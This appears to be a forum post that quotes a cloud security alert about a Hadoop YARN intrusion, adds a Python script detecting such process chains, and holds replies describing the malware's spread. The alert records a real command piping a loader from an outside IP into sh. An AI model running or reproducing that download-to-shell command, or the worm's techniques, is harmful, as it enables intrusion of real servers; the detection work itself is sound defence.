Malicious script: malicious script code execution (pending)
Notes
This alert was raised by the following detection engine:
Command line: wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh
Process PID: 20234
Process file name: wget
Parent process ID: 19624
Parent process file path: /usr/bin/bash
Process chain:
-[3020] /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager -Xmx1536m -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir= -Dyarn.id.str=hadoop -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Dnodemanager.audit.logger.appender=NMAUDIT -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -Dyarn.policy.file=hadoop-policy.xml -server -javaagent:/var/lib/ecm-agent/data/jmxetric-1.0.8.jar=host=localhost,port=8649,mode=unicast,wireformat31x=true,process=YARN_NodeManager,cxss=/var/lib/ecm-agent/data/jmxetric.xml -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=128M -Xloggc:/var/log/hadoop-yarn/nodemanager-gc.log -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -classpath /etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/*:/usr/lib/hadoop-current/lib/*:/usr/lib/tez-current/*:/usr/lib/tez-current/lib/*:/etc/ecm/tez-conf:/opt/apps/extra-jars/*:/usr/lib/spark-current/yarn/spark-2.4.5-yarn-shuffle.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/etc/ecm/hadoop-conf/nm-config/log4j.properties org.apache.hadoop.yarn.server.nodemanager.NodeManager
-[19619] bash /mnt/disk2/yarn/usercache/dr.who/appcache/application_1612510029551_7345/container_1612510029551_7345_02_000001/default_container_executor.sh
-[19622] /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
-[19624] /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
Event description: Cloud Security Center has detected that your host is executing malicious script code (including but not limited to bash, powershell and python). Please investigate the source of the intrusion immediately. If this was your own operations activity, choose Ignore.
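The process chain in the alert has a shape a defender can key on: the YARN NodeManager launches a container executor script under the usercache of `dr.who` (Hadoop's default static web user when no authentication is configured), and that container immediately runs a `curl`/`wget` download piped into `sh`. The following script is an added example, not part of the original post or of any vendor's product: it parses process-chain lines in the same `-[PID] command line` layout as the alert and reports those three signals. The sample chains, PIDs, the `etl` user and the TEST-NET IP `198.51.100.7` are constructed for the demonstration; `hadoopUnauth` is the user-agent string from the alert.

```python
import re
from typing import List, Tuple

# Constructed sample input (not copied from a real host). The first chain mirrors the
# shape of the alert above; the second is a benign YARN container for comparison.
MALICIOUS_CHAIN = """\
-[3020] /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager org.apache.hadoop.yarn.server.nodemanager.NodeManager
-[19619] bash /mnt/disk2/yarn/usercache/dr.who/appcache/application_1612510029551_7345/container_1612510029551_7345_02_000001/default_container_executor.sh
-[19622] /bin/bash -c (curl --user-agent hadoopUnauth http://198.51.100.7/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://198.51.100.7/ldr.sh)|sh
"""

BENIGN_CHAIN = """\
-[3020] /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager org.apache.hadoop.yarn.server.nodemanager.NodeManager
-[40001] bash /mnt/disk2/yarn/usercache/etl/appcache/application_1612510029551_8001/container_1612510029551_8001_01_000003/default_container_executor.sh
-[40004] /usr/bin/python3 /mnt/disk2/yarn/usercache/etl/appcache/application_1612510029551_8001/container_1612510029551_8001_01_000003/mapper.py
"""

# "-[PID] command line", as printed in the alert's process chain.
CHAIN_LINE = re.compile(r"^-\[(\d+)\]\s+(.*)$")
# YARN container launch script; group 1 is the submitting user taken from the usercache path.
CONTAINER_EXECUTOR = re.compile(r"/yarn/usercache/([^/]+)/appcache/.*default_container_executor\.sh")
# A downloader whose output is piped straight into a shell.
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
DEFAULT_USER = "dr.who"      # Hadoop's default static web user (hadoop.http.staticuser.user)
KNOWN_UA = "hadoopUnauth"    # user-agent string seen in the alert above


def parse_chain(text: str) -> List[Tuple[int, str]]:
    """Turn the alert's chain lines into (pid, cmdline) pairs, skipping anything else."""
    procs = []
    for line in text.splitlines():
        m = CHAIN_LINE.match(line.strip())
        if m:
            procs.append((int(m.group(1)), m.group(2)))
    return procs


def analyze_chain(text: str) -> List[str]:
    """Return one reason string per suspicious signal; an empty list means nothing was flagged."""
    reasons = []
    yarn_user = None  # set once we have passed a container executor in the chain
    for pid, cmd in parse_chain(text):
        m = CONTAINER_EXECUTOR.search(cmd)
        if m:
            yarn_user = m.group(1)
            if yarn_user == DEFAULT_USER:
                reasons.append(f"pid {pid}: YARN container submitted as '{DEFAULT_USER}' "
                               "(the user unauthenticated REST callers get)")
            continue
        if yarn_user is not None and DOWNLOAD_TO_SHELL.search(cmd):
            reasons.append(f"pid {pid}: download piped into a shell inside the YARN container of '{yarn_user}'")
        if KNOWN_UA in cmd:
            reasons.append(f"pid {pid}: known user-agent string '{KNOWN_UA}'")
    return reasons


if __name__ == "__main__":
    for name, chain in (("malicious", MALICIOUS_CHAIN), ("benign", BENIGN_CHAIN)):
        hits = analyze_chain(chain)
        print(f"{name}: {len(hits)} signal(s)")
        for reason in hits:
            print("  " + reason)
```

The check that matters most is the first one: a container running as `dr.who` means the job was submitted without authentication, which is the condition that makes the download-to-shell line possible in the first place. The user-agent match is included only because it is an indicator from this alert; it is the weakest of the three and is the one an operator should expect to drift.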
#1 march1993 2021-05-17 16:57:44 +08:00
1) There is also a BrowserUpdate.exe.. it replaces every .html, .php and .jsp.. impressive.. why not just inject JS into the html, that would be more practical..
2) It also wrote 8.8.8.8 into the DNS config; was it burned badly by DNS before?
3) No crontab? It installs one for you?? And the kind that supports both apt and yum???
4) It follows bash_history and infects every host that was logged into? 666
5) The server itself was not actually mined on...
#3 missz 2021-05-18 10:16:06 +08:00
It was probably deleted by security software such as Yundun (云盾).